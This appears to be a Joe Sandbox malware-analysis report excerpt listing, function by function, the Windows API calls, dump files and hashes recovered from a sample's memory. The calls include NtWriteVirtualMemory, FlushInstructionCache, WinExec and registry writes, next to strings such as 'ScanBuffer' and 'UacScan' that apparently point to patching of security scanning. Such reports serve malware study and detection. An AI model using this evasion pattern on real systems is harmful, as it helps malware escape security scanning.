                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule$AddressProc$Exec
                                                                                                                    • String ID: Kernel32$WinExec
                                                                                                                    • API String ID: 2292790416-3609268280
                                                                                                                    • Opcode ID: 747be19e6a19279d4efdf5e6e703b8df695d43c680a33ac4fc16dfb220c07c5a
                                                                                                                    • Instruction ID: c963c823dc145197ca7cbaf9661f38fd0b16af3fc378971b41560b694423f9ac
                                                                                                                    • Opcode Fuzzy Hash: 747be19e6a19279d4efdf5e6e703b8df695d43c680a33ac4fc16dfb220c07c5a
                                                                                                                    • Instruction Fuzzy Hash: 76F08C74A84244BFEB00EFA9EC22F5EB7EDE709B00F908420F900D2740D770AD11AA24
                                                                                                                    APIs
                                                                                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02DA5D74,?,?,02DA3900,00000001), ref: 02DA5C88
                                                                                                                    • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02DA5D74,?,?,02DA3900,00000001), ref: 02DA5CB6
                                                                                                                      • Part of subcall function 02D97D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02DA3900,02DA5CF6,00000000,02DA5D74,?,?,02DA3900), ref: 02D97DAA
                                                                                                                      • Part of subcall function 02D97F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02DA3900,02DA5D11,00000000,02DA5D74,?,?,02DA3900,00000001), ref: 02D97FB7
                                                                                                                    • GetLastError.KERNEL32(00000000,02DA5D74,?,?,02DA3900,00000001), ref: 02DA5D1B
                                                                                                                      • Part of subcall function 02D9A778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02D9C3D9,00000000,02D9C433), ref: 02D9A797
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 503785936-0
                                                                                                                    • Opcode ID: 271736575129beaeda2892a045024f59599b7988def78fea40e0656419a6536d
                                                                                                                    • Instruction ID: 5b04102625078c000467bcdcd8b9839f3d7c043835c8ccb4f2a148393b3d99b4
                                                                                                                    • Opcode Fuzzy Hash: 271736575129beaeda2892a045024f59599b7988def78fea40e0656419a6536d
                                                                                                                    • Instruction Fuzzy Hash: 47314A70E006099FDF00EFA8D891B9EBBF6EB09704F908465E904AB391D7759E058FB1
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyA.ADVAPI32(?,00000000,02F0BA58), ref: 02DAF258
                                                                                                                    • RegSetValueExA.ADVAPI32(00000894,00000000,00000000,00000001,00000000,0000001C,00000000,02DAF2C3), ref: 02DAF290
                                                                                                                    • RegCloseKey.ADVAPI32(00000894,00000894,00000000,00000000,00000001,00000000,0000001C,00000000,02DAF2C3), ref: 02DAF29B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseOpenValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 779948276-0
                                                                                                                    • Opcode ID: 3585f46861aaf91181038ab669a4d70d26ff76618e7e31ef7ce79ba53c136fb1
                                                                                                                    • Instruction ID: f297c55cbd412fcfefad1cfe25c049945f58acfdd4e5092ba88f1ef542fcb0c8
                                                                                                                    • Opcode Fuzzy Hash: 3585f46861aaf91181038ab669a4d70d26ff76618e7e31ef7ce79ba53c136fb1
                                                                                                                    • Instruction Fuzzy Hash: 0A115571A44208BFEF40EFA9E891E9AB7EDEB09304F404465B904D7751EA34EE018FA0
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyA.ADVAPI32(?,00000000,02F0BA58), ref: 02DAF258
                                                                                                                    • RegSetValueExA.ADVAPI32(00000894,00000000,00000000,00000001,00000000,0000001C,00000000,02DAF2C3), ref: 02DAF290
                                                                                                                    • RegCloseKey.ADVAPI32(00000894,00000894,00000000,00000000,00000001,00000000,0000001C,00000000,02DAF2C3), ref: 02DAF29B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseOpenValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 779948276-0
                                                                                                                    • Opcode ID: 6ebb4451556a89600847a32732837ae06d51727e6b2582c5f2fbe83a0241a23c
                                                                                                                    • Instruction ID: 1df0ca503931b232fa3c353e4d1830aa138a2346821d03201abc73938a916766
                                                                                                                    • Opcode Fuzzy Hash: 6ebb4451556a89600847a32732837ae06d51727e6b2582c5f2fbe83a0241a23c
                                                                                                                    • Instruction Fuzzy Hash: 43115571A44208BFEF40EFA9E891E9AB7ADEB09304F404465B904D7751DA34EE018FA0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClearVariant
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1473721057-0
                                                                                                                    • Opcode ID: 7b29260433b4f655143793486a1c40719fdb77fca52ac62bdbf8ee4c46cb4f86
                                                                                                                    • Instruction ID: 80a0290ae4305453a733075870e0fa0b531987a93a1523beadfb9c13cd2c0add
                                                                                                                    • Opcode Fuzzy Hash: 7b29260433b4f655143793486a1c40719fdb77fca52ac62bdbf8ee4c46cb4f86
                                                                                                                    • Instruction Fuzzy Hash: F6F0A970718110C78F24FB39D884A69279AAF44342B505937B8CA9B302CB6ACC85CBB2
                                                                                                                    APIs
                                                                                                                    • SysFreeString.OLEAUT32(02DAF4A4), ref: 02D94C6E
                                                                                                                    • SysAllocStringLen.OLEAUT32(?,?), ref: 02D94D5B
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 02D94D6D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: String$Free$Alloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 986138563-0
                                                                                                                    • Opcode ID: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                                                                    • Instruction ID: 84d3c512985cd878dcf4e3f7b1de7389157bd95b990f44d3ac404db9d9a20a49
                                                                                                                    • Opcode Fuzzy Hash: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                                                                    • Instruction Fuzzy Hash: 5CE0ECB82052066EEF146F219941A3A222AEFC2794F14C499B840CA358D738DC41ED78
                                                                                                                    APIs
                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 02DA73DA
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeString
                                                                                                                    • String ID: H
                                                                                                                    • API String ID: 3341692771-2852464175
                                                                                                                    • Opcode ID: 9e33f421ac6e00ac85074b921f7a865f1e9a970ccf573cf6e782b28cb47accb9
                                                                                                                    • Instruction ID: 7c41aae59ca09586b6b2f0f14ea67eca08405eebce54e393556de789d7a3e670
                                                                                                                    • Opcode Fuzzy Hash: 9e33f421ac6e00ac85074b921f7a865f1e9a970ccf573cf6e782b28cb47accb9
                                                                                                                    • Instruction Fuzzy Hash: BBB1D074A016089FEB15CFA9D490A9DFBF2FF89314F258569E855AB320D730AC45CF50
                                                                                                                    APIs
                                                                                                                    • VariantCopy.OLEAUT32(00000000,00000000), ref: 02D9E781
                                                                                                                      • Part of subcall function 02D9E364: VariantClear.OLEAUT32(?), ref: 02D9E373
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearCopy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 274517740-0
                                                                                                                    • Opcode ID: 52ac32875b134fad6460299de5b919f578df8f9b7bb2a1b7e1743ba9b5388b36
                                                                                                                    • Instruction ID: 0a36e7967bffa868831ee356b2151924933fd3327cc0254f780c89d7bd8f1b21
                                                                                                                    • Opcode Fuzzy Hash: 52ac32875b134fad6460299de5b919f578df8f9b7bb2a1b7e1743ba9b5388b36
                                                                                                                    • Instruction Fuzzy Hash: 4911827071021087CF34EF69C8C4AAA77DAEF84751B109467F58A8B315DB31CC41CAB2
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitVariant
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1927566239-0
                                                                                                                    • Opcode ID: 8dbe6a8cbfbf67a3f8c84539702386773ac58ea1fce573b93ae661a6b28e09ba
                                                                                                                    • Instruction ID: 9618dad957012bc4348724d3a221ba0a63a77bcf8566fea44142e6adfcfa728e
                                                                                                                    • Opcode Fuzzy Hash: 8dbe6a8cbfbf67a3f8c84539702386773ac58ea1fce573b93ae661a6b28e09ba
                                                                                                                    • Instruction Fuzzy Hash: 00313E71A00218EBDF10EFA8D884AAA77E9EB0E714F444966F949D3340D735DE50CBA1
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 02DA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DA823C,?,?,00000000,?,02DA7A7E,ntdll,00000000,00000000,02DA7AC3,?,?,00000000), ref: 02DA820A
                                                                                                                      • Part of subcall function 02DA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DA821E
                                                                                                                      • Part of subcall function 02DA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DA82FC,?,?,00000000,00000000,?,02DA8215,00000000,KernelBASE,00000000,00000000,02DA823C), ref: 02DA82C1
                                                                                                                      • Part of subcall function 02DA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DA82C7
                                                                                                                      • Part of subcall function 02DA8274: GetProcAddress.KERNEL32(?,?), ref: 02DA82D9
                                                                                                                      • Part of subcall function 02DA7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DA7DEC
                                                                                                                      • Part of subcall function 02DA8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02DA83C2), ref: 02DA83A4
                                                                                                                    • FreeLibrary.KERNEL32(74AD0000,00000000,00000000,00000000,00000000,02E1738C,Function_0000662C,00000004,02E1739C,02E1738C,05F5E103,00000040,02E173A0,74AD0000,00000000,00000000), ref: 02DA8AAA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1478290883-0
                                                                                                                    • Opcode ID: 9ce9553e0915814cf372ac784aa04d8dfa95c1a15802b8ce203dfc3be2e0d387
                                                                                                                    • Instruction ID: 5e5b228581d5f2c39e35b3f7533a6ef357488a604eb42288a626e47a2426a767
                                                                                                                    • Opcode Fuzzy Hash: 9ce9553e0915814cf372ac784aa04d8dfa95c1a15802b8ce203dfc3be2e0d387
                                                                                                                    • Instruction Fuzzy Hash: 94210EB0AC0300BEEB40EBA5DC12F5EB7AAEB04B00F505564B905E7381DB74AD819A69
                                                                                                                    APIs
                                                                                                                    • CLSIDFromProgID.OLE32(00000000,?,00000000,02DA6DB9,?,?,?,00000000), ref: 02DA6D99
                                                                                                                      • Part of subcall function 02D94C60: SysFreeString.OLEAUT32(02DAF4A4), ref: 02D94C6E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeFromProgString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4225568880-0
                                                                                                                    • Opcode ID: bc63c45d645a732555e07a7cca6385c29d354d26457eab9f8a5a90b78c8a4686
                                                                                                                    • Instruction ID: 977772a37feaf15d12aec5bc0ad0f09f252a6f031e0d130a3753e543efc43702
                                                                                                                    • Opcode Fuzzy Hash: bc63c45d645a732555e07a7cca6385c29d354d26457eab9f8a5a90b78c8a4686
                                                                                                                    • Instruction Fuzzy Hash: DCE0ED39200208BFEF11EB6AEC61D8E77ADDF8A750F5104B1F80093700EA75AE0488B0
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameA.KERNEL32(02D90000,?,00000105), ref: 02D95886
                                                                                                                      • Part of subcall function 02D95ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02D90000,02DBE790), ref: 02D95AE8
                                                                                                                      • Part of subcall function 02D95ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02D90000,02DBE790), ref: 02D95B06
                                                                                                                      • Part of subcall function 02D95ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02D90000,02DBE790), ref: 02D95B24
                                                                                                                      • Part of subcall function 02D95ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02D95B42
                                                                                                                      • Part of subcall function 02D95ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02D95BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02D95B8B
                                                                                                                      • Part of subcall function 02D95ACC: RegQueryValueExA.ADVAPI32(?,02D95D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02D95BD1,?,80000001), ref: 02D95BA9
                                                                                                                      • Part of subcall function 02D95ACC: RegCloseKey.ADVAPI32(?,02D95BD8,00000000,?,?,00000000,02D95BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02D95BCB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2796650324-0
                                                                                                                    • Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                                                    • Instruction ID: 5316040523827f4333ff9d651221114a275c2f7223c7d69a60e909ff41ca2d83
                                                                                                                    • Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                                                    • Instruction Fuzzy Hash: 05E032B1A002149BCF10DEA8D8C0A863398AB08750F440AA1FC68DF34AD7B1DE208BE0
                                                                                                                    APIs
                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02D97DF4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3934441357-0
                                                                                                                    • Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                    • Instruction ID: fa78925e5ae656f97fa640b85168e368859df364d093b4a4596ec2c3d5f682a4
                                                                                                                    • Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                    • Instruction Fuzzy Hash: F4D012B22091506AE724965A6D44EA75ADCCBC6770F100629B558C6280D6208C01C6B1
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesA.KERNEL32(00000000,?,02DB356F,ScanString,02E17380,02DBB7B8,OpenSession,02E17380,02DBB7B8,ScanBuffer,02E17380,02DBB7B8,OpenSession,02E17380,02DBB7B8,Initialize), ref: 02D97E8B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3188754299-0
                                                                                                                    • Opcode ID: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                    • Instruction ID: 0d7d9722e45730bc83b377eea97f2410451df4ef6021edb663125e8e1b0066d9
                                                                                                                    • Opcode Fuzzy Hash: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                    • Instruction Fuzzy Hash: 35C08CF26222020E2F60A6BC5CC4219428D9984138B601E61F438CA3C2D316DC232830
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesA.KERNEL32(00000000,?,02DB041F,ScanString,02E17380,02DBB7B8,OpenSession,02E17380,02DBB7B8,ScanString,02E17380,02DBB7B8,UacScan,02E17380,02DBB7B8,UacInitialize), ref: 02D97E67
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3188754299-0
                                                                                                                    • Opcode ID: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                    • Instruction ID: a3369b9b618c82ac8c000a7aae9682aad9c8a736ad85228b8ea539de78e50442
                                                                                                                    • Opcode Fuzzy Hash: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
